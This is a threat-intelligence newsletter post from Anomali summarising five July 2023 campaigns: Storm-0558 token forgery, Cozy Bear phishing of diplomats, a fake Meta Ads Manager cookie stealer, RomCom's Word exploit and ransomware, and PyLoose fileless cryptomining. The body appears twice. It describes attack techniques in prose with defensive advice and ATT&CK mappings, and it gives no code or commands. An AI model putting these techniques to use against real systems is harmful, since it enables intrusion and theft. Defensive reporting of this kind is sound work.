Blog

Anomali Cyber Watch: Storm-0558 Exploited Microsoft Token Validation Vulnerability, Cozy Bear Targeted Diplomats, PyLoose Uses memfd RAM-Based Filesystem, and More

Anomali Threat Research
July 18, 2023
Table of contents
<div id="weekly"> <p id="intro"> <p>The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics:<b> APT, China, Cloud abuse, Fileless Malware, Phishing, Russia, Vietnam,</b> and<b> Vulnerabilities</b>. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity. <img src="https://cdn.filestackcontent.com/VQ6ViIiQAm9kbvKvRFPj"/><br/> <b>Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.</b> </p> <div class="trending-threats-article" id="trending-threats"> <h2 id="trendingthreats">Trending Cyber News and Threat Intelligence</h2> <h3 id="article-1"><a href="https://www.microsoft.com/en-us/security/blog/2023/07/14/analysis-of-storm-0558-techniques-for-unauthorized-email-access/" target="_blank">Analysis of Storm-0558 Techniques for Unauthorized Email Access</a></h3> <p>(published: July 14, 2023)</p> <p> Storm-0558 is a China-based threat actor with activities and methods consistent with cyberespionage objectives. The group has been abusing OAuth applications, token theft, and token replay against Microsoft accounts since at least August 2021. From April to July 4, 2023, a new Storm-0558 campaign targeted approximately 25 organizations, including government agencies and related consumer accounts. The actors exploited a validation vulnerability to forge Azure AD tokens using an acquired Microsoft account (MSA) consumer signing key. Storm-0558 proceeded to use PowerShell and Python scripts to perform REST API calls against the OWA Exchange Store service to extract email data.<br/> <b>Analyst Comment:</b> Microsoft has taken steps to block the underlying validation vulnerability and invalidated the actor-acquired MSA signing key. Storm-0558 has since transitioned to other techniques. No further customer action is required to prevent the described key forgery, but Anomali Match customers can use the available historical indicators to detect past occurrences of such attacks using retrospective search capabilities.<br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/attackpattern/10026" target="_blank">[MITRE ATT&amp;CK] T1606.002 - Forge Web Credentials: Saml Tokens</a> | <a href="https://ui.threatstream.com/attackpattern/10030" target="_blank">[MITRE ATT&amp;CK] T1528 - Steal Application Access Token</a> | <a href="https://ui.threatstream.com/attackpattern/10032" target="_blank">[MITRE ATT&amp;CK] T1550.001 - Use Alternate Authentication Material: Application Access Token</a> | <a href="https://ui.threatstream.com/attackpattern/3712" target="_blank">[MITRE ATT&amp;CK] T1059.001: PowerShell</a> | <a href="https://ui.threatstream.com/attackpattern/9668" target="_blank">[MITRE ATT&amp;CK] T1114 - Email Collection</a><br/> <b>Tags:</b> actor:Storm-0558, malware:Cigril, detection:Trojan:Win64/Cigril, detection:Trojan:Win32/Cigril, abused:PowerShell, abused:Python, target-software:Microsoft Exchange, target-industry:Government, source-country:China, technique:Token forgery, vulnerability-type:Validation error, file-type:DLL, target-system:Windows </p> <h3 id="article-2"><a href="https://unit42.paloaltonetworks.com/cloaked-ursa-phishing/" target="_blank">Diplomats Beware: Cloaked Ursa Phishing With a Twist</a></h3> <p>(published: July 12, 2023)</p> <p> In 2023, the Russia-sponsored Cozy Bear group (APT29, Cloaked Ursa, Midnight Blizzard/Nobelium) was involved in direct cyberespionage targeting of various diplomats. From February-March, the group targeted the Turkish Ministry of Foreign Affairs. In May, at least 22 diplomatic missions located in Kyiv, Ukraine were targeted with phishing attachments. In both cases, Microsoft Graph and Dropbox APIs were abused for C2 communication. Payloads detected in these incidents shared encryption implementation and other similarities with previously-reported Cozy Bear malwares such as SNOWYAMBER and QUARTERRIG. <br/> <b>Analyst Comment:</b> Network defenders should consider additional scrutiny for attachments with the following file extensions: .hta, .htm, .html, .mht, .mhtml, .svg, .xht and .xhtml. Teach your users to identify mismatched and obfuscated file extension types. Look for hidden files and directories in archives. All known network indicators associated with this Cozy Bear campaign are available in the Anomali platform and customers are advised to block these on their infrastructure.<br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/attackpattern/12882" target="_blank">[MITRE ATT&amp;CK] T1027.006 - Obfuscated Files or Information: Html Smuggling</a> | <a href="https://ui.threatstream.com/attackpattern/10001" target="_blank">[MITRE ATT&amp;CK] T1566.001 - Phishing: Spearphishing Attachment</a> | <a href="https://ui.threatstream.com/attackpattern/9597" target="_blank">[MITRE ATT&amp;CK] T1036 - Masquerading</a> | <a href="https://ui.threatstream.com/attackpattern/10105" target="_blank">[MITRE ATT&amp;CK] T1574.001 - Hijack Execution Flow: Dll Search Order Hijacking</a> | <a href="https://ui.threatstream.com/attackpattern/9814" target="_blank">[MITRE ATT&amp;CK] T1055 - Process Injection</a> | <a href="https://ui.threatstream.com/attackpattern/22938" target="_blank">[MITRE ATT&amp;CK] Defense Evasion - Obfuscated Files or Information [T1027]</a> | <a href="https://ui.threatstream.com/attackpattern/22186" target="_blank">[MITRE ATT&amp;CK] Defense Evasion - Deobfuscate/Decode Files or Information [T1140]</a> | <a href="https://ui.threatstream.com/attackpattern/9748" target="_blank">[MITRE ATT&amp;CK] T1567.002 - Exfiltration Over Web Service: Exfiltration To Cloud Storage</a><br/> <b>Tags:</b> actor:APT29, actor:Cloaked Ursa, mitre-group:Cozy Bear, actor:Midnight Blizzard, actor:Nobelium, source-country:Russia, actor-identity:Foreign Intelligence Service, target-country:Turkey, target-country:Ukraine, target-country:Albania, target-country:Argentina, target-country:Canada, target-country:Cyprus, target-country:Denmark, target-country:Estonia, target-country:Greece, target-country:Iraq, target-country:Ireland, target-country:Kuwait, target-country:Kyrgyzstan, target-country:Latvia, target-country:Libya, target-country:Netherlands, target-country:Norway, target-country:Slovakia, target-country:Spain, target-country:Sudan, target-country:Turkey, target-country:Turkmenistan, target-country:United States, target-country:Uzbekistan, malware:SNOWYAMBER, malware:QUARTERRIG, abused:Microsoft Graph, abused:Dropbox API, file-type:DOCX, file-type:HTML, technique:HTML smuggling, file-type:ISO, file-type:LNK, file-type:EXE, file-type:DLL, target-system:Windows </p> <h3 id="article-3"><a href="https://www.malwarebytes.com/blog/threat-intelligence/2023/07/criminals-target-businesses-with-malicious-extension-for-metas-ads-manager-and-accidentally-leak-stolen-accounts" target="_blank">Criminals Target Businesses with Malicious Extension for Meta's Ads Manager and Accidentally Leak Stolen Accounts</a></h3> <p>(published: July 12, 2023)</p> <p> Malwarebytes has identified a Vietnam-based campaign impersonating Facebook Ads Manager to steal Facebook business account cookies. Over 800 victims have been identified worldwide (310 in the USA), with more than $180K in compromised ad budgets. Fake Ads Manager software has been promoted on Facebook pointing to password-protected RAR archives hosted on various cloud accounts (Google, Trello, and others). Extracted MSI installer packages install several components, spawns a new browser window launched with the custom malicious extension pointing the target to the Facebook login page. The attackers steal Facebook cookies and exfiltrate them by abusing Google Analytics. The ultimate goal is to steal ad budgets to place out malicious ads to ensnare more victims and for other malicious purposes.<br/> <b>Analyst Comment:</b> Facebook business account owners should regularly review their transactions history. Revoke access to unknown users from your Business Manager account profile. Be cautious around promoted content, double-check domains that offer you installers and other software components. All known network indicators associated with this campaign are available in the Anomali platform and customers are advised to block these on their infrastructure.<br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/attackpattern/23207" target="_blank">[MITRE ATT&amp;CK] Command and Control - Remote File Copy [T1105]</a> | <a href="https://ui.threatstream.com/attackpattern/22938" target="_blank">[MITRE ATT&amp;CK] Defense Evasion - Obfuscated Files or Information [T1027]</a> | <a href="https://ui.threatstream.com/attackpattern/22186" target="_blank">[MITRE ATT&amp;CK] Defense Evasion - Deobfuscate/Decode Files or Information [T1140]</a> | <a href="https://ui.threatstream.com/attackpattern/10031" target="_blank">[MITRE ATT&amp;CK] T1539 - Steal Web Session Cookie</a> | <a href="https://ui.threatstream.com/attackpattern/10024" target="_blank">[MITRE ATT&amp;CK] T1550.004 - Use Alternate Authentication Material: Web Session Cookie</a> | <a href="https://ui.threatstream.com/attackpattern/10081" target="_blank">[MITRE ATT&amp;CK] T1036.005 - Masquerading: Match Legitimate Name Or Location</a><br/> <b>Tags:</b> source-country:Vietnam, technique:Malvertising, technique:malicious Chrome extension, target-identity:Facebook business account, impersonated:Facebook Ads Manager, impersonated:Meta, impersonated:Google Translate, abused:Trello, abused:Google, abused:Google Analytics, file-type:RAR, file-type:MSI, file-type:JS, file-type:EXE, target-software:Chrome, target-system:Windows </p> <h3 id="article-4"><a href="https://www.microsoft.com/en-us/security/blog/2023/07/11/storm-0978-attacks-reveal-financial-and-espionage-motives/" target="_blank">Storm-0978 Attacks Reveal Financial and Espionage Motives</a></h3> <p>(published: July 11, 2023)</p> <p> RomCom (DEV-0978, Storm-0978) is a Russia-based threat group that has been involved in ransomware operations since at least May 2022 and in cyberespionage since October 2022. The intrusions were utilizing trojanized software, phishing emails, and, most recently, the exploitation of the CVE-2023-36884 remote code execution vulnerability in Microsoft Word. The RomCom cyberespionage campaign in June 2023 included a Ukrainian-themed phishing campaign containing a fake OneDrive loader. It was delivering a backdoor with similarities to the RomCom backdoor to defense and government entities in Europe and North America. The group’s ransomware campaigns can start with the same initial payloads, but they are opportunistic in nature, impacting the telecommunications and finance industries. RomCom was getting system-level privileges and dumps password hashes from the Security Account Manager using the Windows registry. The group then used the Impacket framework’s SMBExec and WMIExec functionalities for lateral movement. In July 2023, RomCom began using a ransomware variant called Underground, which contains significant code overlaps with its previous Industrial Spy ransomware. <br/> <b>Analyst Comment:</b> Network defenders are advised to enforce the "Block all Office applications from creating child processes" attack-surface reduction rule. Keep your systems updated, or implement Microsoft CVE-2023-36884-specific recommendations.<br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/attackpattern/9883" target="_blank">[MITRE ATT&amp;CK] T1566 - Phishing</a> | <a href="https://ui.threatstream.com/attackpattern/3714" target="_blank">[MITRE ATT&amp;CK] T1486: Data Encrypted for Impact</a> | <a href="https://ui.threatstream.com/attackpattern/9684" target="_blank">[MITRE ATT&amp;CK] T1003.002 - OS Credential Dumping: Security Account Manager</a> | <a href="https://ui.threatstream.com/attackpattern/23579" target="_blank">[MITRE ATT&amp;CK] Picus: T1047 Windows Management Instrumentation of the MITRE ATT&amp;CK Framework</a> | <a href="https://ui.threatstream.com/attackpattern/9647" target="_blank">[MITRE ATT&amp;CK] T1021.002 - Remote Services: Smb/Windows Admin Shares</a><br/> <b>Tags:</b> actor:Storm-0978, actor:RomCom, malware:RomCom, malware-type:Backdoor, malware-type:Infostealer, detection:Ransom:Win32/IndustrialSpy, Trojan:Win32/RomCom, Trojan:Win64/RomCom, HackTool:Win32/Impacket, HackTool:Python/Impacket, malware:Industrial Spy, malware:Underground ransomware, malware:Trigona ransomware, malware-type:Ransomware, abused:​​Impacket, abused:SMBExec, abused:WMIExec, target-industry:Defense, target-industry:IT, target-industry:Finance, target-industry:Government, target-region:Europe, target-region:North America, target-country:Ukraine, source-country:Russia, vulnerability:CVE-2023-36884, vulnerability-type:Remote code execution, abused:Microsoft Word, target-system:Windows </p> <h3 id="article-5"><a href="https://www.wiz.io/blog/pyloose-first-python-based-fileless-attack-on-cloud-workloads" target="_blank">PyLoose: Python-Based Fileless Malware Targets Cloud Workloads to Deliver Cryptominer</a></h3> <p>(published: July 11, 2023)</p> <p> First detected on June 22, 2023, a new fileless attack, dubbed PyLoose, has targeted close to 200 cloud workloads (collections of cloud assets collectively supporting a defined process). The attack uses Python code to load an XMRig Miner directly into memory, a technique that is difficult to detect with traditional security solutions. It does so by abusing the Linux memfd RAM-based filesystem. Wiz researchers detected that the initial attack vector was exploiting publicly accessible Jupyter Notebook services.<br/> <b>Analyst Comment:</b> Organizations should limit unnecessary public exposure of Jupyter Notebook services. All known PyLoose indicators are available in the Anomali platform and customers are advised to block these on their infrastructure.<br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/attackpattern/23207" target="_blank">[MITRE ATT&amp;CK] Command and Control - Remote File Copy [T1105]</a> | <a href="https://ui.threatstream.com/attackpattern/9721" target="_blank">[MITRE ATT&amp;CK] T1102 - Web Service</a> | <a href="https://ui.threatstream.com/attackpattern/22186" target="_blank">[MITRE ATT&amp;CK] Defense Evasion - Deobfuscate/Decode Files or Information [T1140]</a> | <a href="https://ui.threatstream.com/attackpattern/9592" target="_blank">[MITRE ATT&amp;CK] T1027.002 - Obfuscated Files or Information: Software Packing</a> | <a href="https://ui.threatstream.com/attackpattern/12881" target="_blank">[MITRE ATT&amp;CK] T1620 - Reflective Code Loading</a> | <a href="https://ui.threatstream.com/attackpattern/10023" target="_blank">[MITRE ATT&amp;CK] T1496 - Resource Hijacking</a><br/> <b>Tags:</b> malware:PyLoose, abused:memfd, abused:Python, abused:Base64, abused:zlib, abused:MoneroOcean, technique:Fileless malware, detection:XMRig, technique:Cryptomining, target-software:Jupyter Notebook, target-system:Linux </p> </div> </p></div>
Anomali Threat Research

Anomali's Threat Research team continually tracks security threats to identify when new, highly critical security threats emerge. The Anomali Threat Research team's briefings discuss current threats and risks like botnets, data breaches, misconfigurations, ransomware, threat groups, and various vulnerabilities. The team also creates free and premium threat intelligence feeds for Anomali's industry-leading Threat Intelligence Platform, ThreatStream.

Propel your mission with amplified visibility, analytics, and AI.

Learn how Anomali can help you cost-effectively improve your security posture.

July 18, 2023
-
Anomali Threat Research
,

Anomali Cyber Watch: Storm-0558 Exploited Microsoft Token Validation Vulnerability, Cozy Bear Targeted Diplomats, PyLoose Uses memfd RAM-Based Filesystem, and More

<div id="weekly"> <p id="intro"> <p>The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics:<b> APT, China, Cloud abuse, Fileless Malware, Phishing, Russia, Vietnam,</b> and<b> Vulnerabilities</b>. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity. <img src="https://cdn.filestackcontent.com/VQ6ViIiQAm9kbvKvRFPj"/><br/> <b>Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.</b> </p> <div class="trending-threats-article" id="trending-threats"> <h2 id="trendingthreats">Trending Cyber News and Threat Intelligence</h2> <h3 id="article-1"><a href="https://www.microsoft.com/en-us/security/blog/2023/07/14/analysis-of-storm-0558-techniques-for-unauthorized-email-access/" target="_blank">Analysis of Storm-0558 Techniques for Unauthorized Email Access</a></h3> <p>(published: July 14, 2023)</p> <p> Storm-0558 is a China-based threat actor with activities and methods consistent with cyberespionage objectives. The group has been abusing OAuth applications, token theft, and token replay against Microsoft accounts since at least August 2021. From April to July 4, 2023, a new Storm-0558 campaign targeted approximately 25 organizations, including government agencies and related consumer accounts. The actors exploited a validation vulnerability to forge Azure AD tokens using an acquired Microsoft account (MSA) consumer signing key. Storm-0558 proceeded to use PowerShell and Python scripts to perform REST API calls against the OWA Exchange Store service to extract email data.<br/> <b>Analyst Comment:</b> Microsoft has taken steps to block the underlying validation vulnerability and invalidated the actor-acquired MSA signing key. Storm-0558 has since transitioned to other techniques. No further customer action is required to prevent the described key forgery, but Anomali Match customers can use the available historical indicators to detect past occurrences of such attacks using retrospective search capabilities.<br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/attackpattern/10026" target="_blank">[MITRE ATT&amp;CK] T1606.002 - Forge Web Credentials: Saml Tokens</a> | <a href="https://ui.threatstream.com/attackpattern/10030" target="_blank">[MITRE ATT&amp;CK] T1528 - Steal Application Access Token</a> | <a href="https://ui.threatstream.com/attackpattern/10032" target="_blank">[MITRE ATT&amp;CK] T1550.001 - Use Alternate Authentication Material: Application Access Token</a> | <a href="https://ui.threatstream.com/attackpattern/3712" target="_blank">[MITRE ATT&amp;CK] T1059.001: PowerShell</a> | <a href="https://ui.threatstream.com/attackpattern/9668" target="_blank">[MITRE ATT&amp;CK] T1114 - Email Collection</a><br/> <b>Tags:</b> actor:Storm-0558, malware:Cigril, detection:Trojan:Win64/Cigril, detection:Trojan:Win32/Cigril, abused:PowerShell, abused:Python, target-software:Microsoft Exchange, target-industry:Government, source-country:China, technique:Token forgery, vulnerability-type:Validation error, file-type:DLL, target-system:Windows </p> <h3 id="article-2"><a href="https://unit42.paloaltonetworks.com/cloaked-ursa-phishing/" target="_blank">Diplomats Beware: Cloaked Ursa Phishing With a Twist</a></h3> <p>(published: July 12, 2023)</p> <p> In 2023, the Russia-sponsored Cozy Bear group (APT29, Cloaked Ursa, Midnight Blizzard/Nobelium) was involved in direct cyberespionage targeting of various diplomats. From February-March, the group targeted the Turkish Ministry of Foreign Affairs. In May, at least 22 diplomatic missions located in Kyiv, Ukraine were targeted with phishing attachments. In both cases, Microsoft Graph and Dropbox APIs were abused for C2 communication. Payloads detected in these incidents shared encryption implementation and other similarities with previously-reported Cozy Bear malwares such as SNOWYAMBER and QUARTERRIG. <br/> <b>Analyst Comment:</b> Network defenders should consider additional scrutiny for attachments with the following file extensions: .hta, .htm, .html, .mht, .mhtml, .svg, .xht and .xhtml. Teach your users to identify mismatched and obfuscated file extension types. Look for hidden files and directories in archives. All known network indicators associated with this Cozy Bear campaign are available in the Anomali platform and customers are advised to block these on their infrastructure.<br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/attackpattern/12882" target="_blank">[MITRE ATT&amp;CK] T1027.006 - Obfuscated Files or Information: Html Smuggling</a> | <a href="https://ui.threatstream.com/attackpattern/10001" target="_blank">[MITRE ATT&amp;CK] T1566.001 - Phishing: Spearphishing Attachment</a> | <a href="https://ui.threatstream.com/attackpattern/9597" target="_blank">[MITRE ATT&amp;CK] T1036 - Masquerading</a> | <a href="https://ui.threatstream.com/attackpattern/10105" target="_blank">[MITRE ATT&amp;CK] T1574.001 - Hijack Execution Flow: Dll Search Order Hijacking</a> | <a href="https://ui.threatstream.com/attackpattern/9814" target="_blank">[MITRE ATT&amp;CK] T1055 - Process Injection</a> | <a href="https://ui.threatstream.com/attackpattern/22938" target="_blank">[MITRE ATT&amp;CK] Defense Evasion - Obfuscated Files or Information [T1027]</a> | <a href="https://ui.threatstream.com/attackpattern/22186" target="_blank">[MITRE ATT&amp;CK] Defense Evasion - Deobfuscate/Decode Files or Information [T1140]</a> | <a href="https://ui.threatstream.com/attackpattern/9748" target="_blank">[MITRE ATT&amp;CK] T1567.002 - Exfiltration Over Web Service: Exfiltration To Cloud Storage</a><br/> <b>Tags:</b> actor:APT29, actor:Cloaked Ursa, mitre-group:Cozy Bear, actor:Midnight Blizzard, actor:Nobelium, source-country:Russia, actor-identity:Foreign Intelligence Service, target-country:Turkey, target-country:Ukraine, target-country:Albania, target-country:Argentina, target-country:Canada, target-country:Cyprus, target-country:Denmark, target-country:Estonia, target-country:Greece, target-country:Iraq, target-country:Ireland, target-country:Kuwait, target-country:Kyrgyzstan, target-country:Latvia, target-country:Libya, target-country:Netherlands, target-country:Norway, target-country:Slovakia, target-country:Spain, target-country:Sudan, target-country:Turkey, target-country:Turkmenistan, target-country:United States, target-country:Uzbekistan, malware:SNOWYAMBER, malware:QUARTERRIG, abused:Microsoft Graph, abused:Dropbox API, file-type:DOCX, file-type:HTML, technique:HTML smuggling, file-type:ISO, file-type:LNK, file-type:EXE, file-type:DLL, target-system:Windows </p> <h3 id="article-3"><a href="https://www.malwarebytes.com/blog/threat-intelligence/2023/07/criminals-target-businesses-with-malicious-extension-for-metas-ads-manager-and-accidentally-leak-stolen-accounts" target="_blank">Criminals Target Businesses with Malicious Extension for Meta's Ads Manager and Accidentally Leak Stolen Accounts</a></h3> <p>(published: July 12, 2023)</p> <p> Malwarebytes has identified a Vietnam-based campaign impersonating Facebook Ads Manager to steal Facebook business account cookies. Over 800 victims have been identified worldwide (310 in the USA), with more than $180K in compromised ad budgets. Fake Ads Manager software has been promoted on Facebook pointing to password-protected RAR archives hosted on various cloud accounts (Google, Trello, and others). Extracted MSI installer packages install several components, spawns a new browser window launched with the custom malicious extension pointing the target to the Facebook login page. The attackers steal Facebook cookies and exfiltrate them by abusing Google Analytics. The ultimate goal is to steal ad budgets to place out malicious ads to ensnare more victims and for other malicious purposes.<br/> <b>Analyst Comment:</b> Facebook business account owners should regularly review their transactions history. Revoke access to unknown users from your Business Manager account profile. Be cautious around promoted content, double-check domains that offer you installers and other software components. All known network indicators associated with this campaign are available in the Anomali platform and customers are advised to block these on their infrastructure.<br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/attackpattern/23207" target="_blank">[MITRE ATT&amp;CK] Command and Control - Remote File Copy [T1105]</a> | <a href="https://ui.threatstream.com/attackpattern/22938" target="_blank">[MITRE ATT&amp;CK] Defense Evasion - Obfuscated Files or Information [T1027]</a> | <a href="https://ui.threatstream.com/attackpattern/22186" target="_blank">[MITRE ATT&amp;CK] Defense Evasion - Deobfuscate/Decode Files or Information [T1140]</a> | <a href="https://ui.threatstream.com/attackpattern/10031" target="_blank">[MITRE ATT&amp;CK] T1539 - Steal Web Session Cookie</a> | <a href="https://ui.threatstream.com/attackpattern/10024" target="_blank">[MITRE ATT&amp;CK] T1550.004 - Use Alternate Authentication Material: Web Session Cookie</a> | <a href="https://ui.threatstream.com/attackpattern/10081" target="_blank">[MITRE ATT&amp;CK] T1036.005 - Masquerading: Match Legitimate Name Or Location</a><br/> <b>Tags:</b> source-country:Vietnam, technique:Malvertising, technique:malicious Chrome extension, target-identity:Facebook business account, impersonated:Facebook Ads Manager, impersonated:Meta, impersonated:Google Translate, abused:Trello, abused:Google, abused:Google Analytics, file-type:RAR, file-type:MSI, file-type:JS, file-type:EXE, target-software:Chrome, target-system:Windows </p> <h3 id="article-4"><a href="https://www.microsoft.com/en-us/security/blog/2023/07/11/storm-0978-attacks-reveal-financial-and-espionage-motives/" target="_blank">Storm-0978 Attacks Reveal Financial and Espionage Motives</a></h3> <p>(published: July 11, 2023)</p> <p> RomCom (DEV-0978, Storm-0978) is a Russia-based threat group that has been involved in ransomware operations since at least May 2022 and in cyberespionage since October 2022. The intrusions were utilizing trojanized software, phishing emails, and, most recently, the exploitation of the CVE-2023-36884 remote code execution vulnerability in Microsoft Word. The RomCom cyberespionage campaign in June 2023 included a Ukrainian-themed phishing campaign containing a fake OneDrive loader. It was delivering a backdoor with similarities to the RomCom backdoor to defense and government entities in Europe and North America. The group’s ransomware campaigns can start with the same initial payloads, but they are opportunistic in nature, impacting the telecommunications and finance industries. RomCom was getting system-level privileges and dumps password hashes from the Security Account Manager using the Windows registry. The group then used the Impacket framework’s SMBExec and WMIExec functionalities for lateral movement. In July 2023, RomCom began using a ransomware variant called Underground, which contains significant code overlaps with its previous Industrial Spy ransomware. <br/> <b>Analyst Comment:</b> Network defenders are advised to enforce the "Block all Office applications from creating child processes" attack-surface reduction rule. Keep your systems updated, or implement Microsoft CVE-2023-36884-specific recommendations.<br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/attackpattern/9883" target="_blank">[MITRE ATT&amp;CK] T1566 - Phishing</a> | <a href="https://ui.threatstream.com/attackpattern/3714" target="_blank">[MITRE ATT&amp;CK] T1486: Data Encrypted for Impact</a> | <a href="https://ui.threatstream.com/attackpattern/9684" target="_blank">[MITRE ATT&amp;CK] T1003.002 - OS Credential Dumping: Security Account Manager</a> | <a href="https://ui.threatstream.com/attackpattern/23579" target="_blank">[MITRE ATT&amp;CK] Picus: T1047 Windows Management Instrumentation of the MITRE ATT&amp;CK Framework</a> | <a href="https://ui.threatstream.com/attackpattern/9647" target="_blank">[MITRE ATT&amp;CK] T1021.002 - Remote Services: Smb/Windows Admin Shares</a><br/> <b>Tags:</b> actor:Storm-0978, actor:RomCom, malware:RomCom, malware-type:Backdoor, malware-type:Infostealer, detection:Ransom:Win32/IndustrialSpy, Trojan:Win32/RomCom, Trojan:Win64/RomCom, HackTool:Win32/Impacket, HackTool:Python/Impacket, malware:Industrial Spy, malware:Underground ransomware, malware:Trigona ransomware, malware-type:Ransomware, abused:​​Impacket, abused:SMBExec, abused:WMIExec, target-industry:Defense, target-industry:IT, target-industry:Finance, target-industry:Government, target-region:Europe, target-region:North America, target-country:Ukraine, source-country:Russia, vulnerability:CVE-2023-36884, vulnerability-type:Remote code execution, abused:Microsoft Word, target-system:Windows </p> <h3 id="article-5"><a href="https://www.wiz.io/blog/pyloose-first-python-based-fileless-attack-on-cloud-workloads" target="_blank">PyLoose: Python-Based Fileless Malware Targets Cloud Workloads to Deliver Cryptominer</a></h3> <p>(published: July 11, 2023)</p> <p> First detected on June 22, 2023, a new fileless attack, dubbed PyLoose, has targeted close to 200 cloud workloads (collections of cloud assets collectively supporting a defined process). The attack uses Python code to load an XMRig Miner directly into memory, a technique that is difficult to detect with traditional security solutions. It does so by abusing the Linux memfd RAM-based filesystem. Wiz researchers detected that the initial attack vector was exploiting publicly accessible Jupyter Notebook services.<br/> <b>Analyst Comment:</b> Organizations should limit unnecessary public exposure of Jupyter Notebook services. All known PyLoose indicators are available in the Anomali platform and customers are advised to block these on their infrastructure.<br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/attackpattern/23207" target="_blank">[MITRE ATT&amp;CK] Command and Control - Remote File Copy [T1105]</a> | <a href="https://ui.threatstream.com/attackpattern/9721" target="_blank">[MITRE ATT&amp;CK] T1102 - Web Service</a> | <a href="https://ui.threatstream.com/attackpattern/22186" target="_blank">[MITRE ATT&amp;CK] Defense Evasion - Deobfuscate/Decode Files or Information [T1140]</a> | <a href="https://ui.threatstream.com/attackpattern/9592" target="_blank">[MITRE ATT&amp;CK] T1027.002 - Obfuscated Files or Information: Software Packing</a> | <a href="https://ui.threatstream.com/attackpattern/12881" target="_blank">[MITRE ATT&amp;CK] T1620 - Reflective Code Loading</a> | <a href="https://ui.threatstream.com/attackpattern/10023" target="_blank">[MITRE ATT&amp;CK] T1496 - Resource Hijacking</a><br/> <b>Tags:</b> malware:PyLoose, abused:memfd, abused:Python, abused:Base64, abused:zlib, abused:MoneroOcean, technique:Fileless malware, detection:XMRig, technique:Cryptomining, target-software:Jupyter Notebook, target-system:Linux </p> </div> </p></div>

Get the Latest Anomali Updates and Cybersecurity News – Straight To Your Inbox

Become a subscriber to the Anomali Newsletter
Receive a monthly summary of our latest threat intelligence content, research, news, events, and more.